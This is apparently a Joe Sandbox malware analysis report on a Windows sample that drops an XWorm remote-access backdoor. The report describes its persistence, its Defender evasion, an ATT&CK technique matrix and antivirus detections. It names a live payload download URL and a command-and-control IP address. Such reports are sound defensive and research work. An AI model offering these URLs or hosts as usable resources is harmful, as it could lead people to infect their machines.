                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Opti.exeQueries volume information: C:\Users\user\AppData\Local\Opti.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Opti.exeQueries volume information: C:\Users\user\AppData\Local\Opti.exe VolumeInformation
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: OptiProV2.exe, 0000000B.00000002.2526931319.000000001BBE0000.00000004.00000020.00020000.00000000.sdmp, OptiProV2.exe, 0000000B.00000002.2526931319.000000001BBAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Program Files\Common Files\OptiProV2.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected XWorm
                  Source: Yara matchFile source: 11.0.OptiProV2.exe.9a0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.OptiProV2.exe.12af9ac0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2523471436.0000000012AF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.1357544208.00000000009A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: OptiProV2.exe PID: 7192, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Program Files\Common Files\OptiProV2.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Opti.exe, type: DROPPED

                  Remote Access Functionality

                  barindex
                  Yara detected XWorm
                  Source: Yara matchFile source: 11.0.OptiProV2.exe.9a0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.OptiProV2.exe.12af9ac0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.OptiProV2.exe.12af9ac0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2523471436.0000000012AF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.1357544208.00000000009A2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: OptiProV2.exe PID: 7192, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Program Files\Common Files\OptiProV2.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Opti.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Windows Management Instrumentation                  		1
                  Scheduled Task/Job                  		12
                  Process Injection                  		3
                  Masquerading                  		OS Credential Dumping221
                  Security Software Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		1
                  Scheduled Task/Job                  		11
                  Disable or Modify Tools                  		LSASS Memory2
                  Process Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Non-Standard Port                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  PowerShell                  		Logon Script (Windows)1
                  DLL Side-Loading                  		131
                  Virtualization/Sandbox Evasion                  		Security Account Manager131
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive11
                  Ingress Tool Transfer                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                  Process Injection                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information                  		LSA Secrets1
                  File and Directory Discovery                  		SSHKeylogging112
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Obfuscated Files or Information                  		Cached Domain Credentials13
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                  Software Packing                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  DLL Side-Loading                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1526374 Sample: r4RF3TX5Mi.exe Startdate: 05/10/2024 Architecture: WINDOWS Score: 100 50 18.31.95.13.in-addr.arpa 2->50 58 Multi AV Scanner detection for domain / URL 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 15 other signatures 2->64 9 r4RF3TX5Mi.exe 14 6 2->9         started        13 Opti.exe 2->13         started        16 Opti.exe 2->16         started        signatures3 process4 dnsIp5 56 15.235.206.13, 49699, 80 HP-INTERNET-ASUS United States 9->56 46 C:\Program Files\Common Files\OptiProV2.exe, PE32 9->46 dropped 48 C:\Users\user\AppData\...\r4RF3TX5Mi.exe.log, CSV 9->48 dropped 18 OptiProV2.exe 4 9->18         started        23 conhost.exe 9->23         started        72 Antivirus detection for dropped file 13->72 74 Multi AV Scanner detection for dropped file 13->74 76 Machine Learning detection for dropped file 13->76 file6 signatures7 process8 dnsIp9 52 147.185.221.21, 4140, 56794 SALSGIVERUS United States 18->52 54 127.0.0.1 unknown unknown 18->54 44 C:\Users\user\AppData\Local\Opti.exe, PE32 18->44 dropped 66 Protects its processes via BreakOnTermination flag 18->66 68 Adds a directory exclusion to Windows Defender 18->68 25 powershell.exe 21 18->25         started        28 powershell.exe 23 18->28         started        30 powershell.exe 20 18->30         started        32 2 other processes 18->32 file10 signatures11 process12 signatures13 70 Loading BitLocker PowerShell Module 25->70 34 conhost.exe 25->34         started        36 conhost.exe 28->36         started        38 conhost.exe 30->38         started        40 conhost.exe 32->40         started        42 conhost.exe 32->42         started        process14

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  r4RF3TX5Mi.exe37%ReversingLabsWin64.Trojan.Sonbokli
                  r4RF3TX5Mi.exe50%VirustotalBrowse

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Opti.exe100%AviraTR/Dropper.Gen
                  C:\Program Files\Common Files\OptiProV2.exe100%AviraTR/Dropper.Gen
                  C:\Users\user\AppData\Local\Opti.exe100%Joe Sandbox ML
                  C:\Program Files\Common Files\OptiProV2.exe100%Joe Sandbox ML
                  C:\Program Files\Common Files\OptiProV2.exe92%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                  C:\Program Files\Common Files\OptiProV2.exe78%VirustotalBrowse
                  C:\Users\user\AppData\Local\Opti.exe92%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                  C:\Users\user\AppData\Local\Opti.exe78%VirustotalBrowse

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  18.31.95.13.in-addr.arpa0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                  http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://aka.ms/pscore680%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                  http://15.235.206.130%VirustotalBrowse
                  http://15.235.206.13/OptiProV2.exeWC:0%VirustotalBrowse
                  https://github.com/Pester/Pester1%VirustotalBrowse
                  147.185.221.2119%VirustotalBrowse
                  http://15.235.206.13/OptiProV2.exe0%VirustotalBrowse
                  127.0.0.11%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  18.31.95.13.in-addr.arpa
                  		unknown
                  		unknownfalseunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://15.235.206.13/OptiProV2.exefalseunknown
                  147.185.221.21trueunknown
                  127.0.0.1trueunknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://15.235.206.13/OptiProV2.exeWC:r4RF3TX5Mi.exefalseunknown
                  http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.1587825867.00000225C60E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1710868001.00000212BC7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1890195200.0000021697FC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2130635621.000001251006B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://crl.mpowershell.exe, 0000000C.00000002.1596115669.00000225CE84E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1723679435.00000212C4BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000017.00000002.1972585830.000001250022A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000C.00000002.1563070719.00000225B6299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1640428748.00000212AC969000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1771422667.000002168817A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1972585830.000001250022A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000017.00000002.1972585830.000001250022A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    http://15.235.206.13r4RF3TX5Mi.exe, 00000001.00000002.1360571480.0000020DA8607000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000C.00000002.1563070719.00000225B6299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1640428748.00000212AC969000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1771422667.000002168817A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1972585830.000001250022A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/powershell.exe, 00000017.00000002.2130635621.000001251006B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.1587825867.00000225C60E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1710868001.00000212BC7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1890195200.0000021697FC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2130635621.000001251006B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000017.00000002.2130635621.000001251006B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://crl.micpowershell.exe, 00000010.00000002.1726278208.00000212C4E70000.00000004.00000001.00020000.00000000.sdmpfalse
                      		unknown
                      https://contoso.com/Iconpowershell.exe, 00000017.00000002.2130635621.000001251006B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crl.micft.cMicRosofpowershell.exe, 00000010.00000002.1726278208.00000212C4E70000.00000004.00000001.00020000.00000000.sdmpfalse
                        		unknown
                        https://aka.ms/pscore68powershell.exe, 0000000C.00000002.1563070719.00000225B6071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1640428748.00000212AC741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1771422667.0000021687F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1972585830.0000012500001000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namer4RF3TX5Mi.exe, 00000001.00000002.1360571480.0000020DA8607000.00000004.00000800.00020000.00000000.sdmp, OptiProV2.exe, 0000000B.00000002.2520367269.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1563070719.00000225B6071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1640428748.00000212AC741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1771422667.0000021687F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1972585830.0000012500001000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000017.00000002.1972585830.000001250022A000.00000004.00000800.00020000.00000000.sdmpfalseunknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        15.235.206.13
                        		unknownUnited States
                        		71HP-INTERNET-ASUSfalse
                        147.185.221.21
                        		unknownUnited States
                        		12087SALSGIVERUStrue

                        Private

                        IP
                        127.0.0.1

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1526374
                        Start date and time:2024-10-05 14:35:12 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 35s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:30
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:r4RF3TX5Mi.exe
                        renamed because original name is a hash value
                        Original Sample Name:a17ed4e602b0d341fc887925bba26643.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@21/21@1/3
                        EGA Information:
                        • Successful, ratio: 12.5%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 69
                        • Number of non-executed functions: 16
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target Opti.exe, PID 1860 because it is empty
                        • Execution Graph export aborted for target Opti.exe, PID 2236 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 2760 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7308 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7720 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7952 because it is empty
                        • Execution Graph export aborted for target r4RF3TX5Mi.exe, PID 6440 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        08:36:18API Interceptor1x Sleep call for process: r4RF3TX5Mi.exe modified
                        08:36:19API Interceptor20x Sleep call for process: OptiProV2.exe modified
                        08:36:28API Interceptor84x Sleep call for process: powershell.exe modified
                        10:10:49API Interceptor2x Sleep call for process: Opti.exe modified
                        16:10:49Task SchedulerRun new task: Opti path: C:\Users\user\AppData\Local\Opti.exe

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        147.185.221.21ra66DSpa.exeGet hashmaliciousXWormBrowse
                          Q5N7WOpk8J.batGet hashmaliciousUnknownBrowse
                            NzEsfIiAc0.exeGet hashmaliciousXWormBrowse
                              Y666Gn09a1.exeGet hashmaliciousXWormBrowse
                                Uhj9qfwbYG.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                  WIN CHANGER 2.3.exeGet hashmaliciousXWormBrowse
                                    jj7svxNeaQ.exeGet hashmaliciousXWormBrowse
                                      PCCooker2.0_x64.exeGet hashmaliciousAsyncRAT, DCRat, GuLoader, Lokibot, Njrat, PureLog Stealer, SilverRatBrowse
                                        JFhDGHXmW6.exeGet hashmaliciousUnknownBrowse
                                          N7bEDDO8u6.exeGet hashmaliciousBlank Grabber, DCRat, Njrat, Umbral Stealer, XWormBrowse

                                            Domains

                                            No context

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            HP-INTERNET-ASUSnovo.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                            • 156.152.126.244
                                            sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                            • 15.235.85.112
                                            175e4400e2e99b0d0ac35bd3fe68519fa91f9ae5cc7a7.exeGet hashmaliciousQuasarBrowse
                                            • 15.204.213.5
                                            sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                            • 15.235.85.194
                                            sostener.vbsGet hashmaliciousRemcosBrowse
                                            • 15.235.85.194
                                            http://WWW.LUTHERANSONLINE.COM/SHALOMICGet hashmaliciousUnknownBrowse
                                            • 15.235.211.177
                                            rsJtZBgpwG.elfGet hashmaliciousMiraiBrowse
                                            • 15.178.34.35
                                            https://jhgfurighiuhoisrfuu98rujerfhiu.pages.dev/coderogers.htmlGet hashmaliciousHTMLPhisherBrowse
                                            • 15.156.174.66
                                            Facturas de pago 003839,72011,030184.bat.exeGet hashmaliciousAgentTeslaBrowse
                                            • 15.235.118.15
                                            https://credit.fb-business.com/Get hashmaliciousUnknownBrowse
                                            • 15.235.209.42
                                            SALSGIVERUSBootstrapperV1.19.exeGet hashmaliciousXWormBrowse
                                            • 147.185.221.22
                                            ra66DSpa.exeGet hashmaliciousXWormBrowse
                                            • 147.185.221.21
                                            tMREqVW0.exeGet hashmaliciousXWormBrowse
                                            • 147.185.221.19
                                            wSVyC8FY.exeGet hashmaliciousXWormBrowse
                                            • 147.185.221.22
                                            eFvQTTtxej.exeGet hashmaliciousNjratBrowse
                                            • 147.185.221.22
                                            Q5N7WOpk8J.batGet hashmaliciousUnknownBrowse
                                            • 147.185.221.21
                                            SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeGet hashmaliciousXWormBrowse
                                            • 147.185.221.22
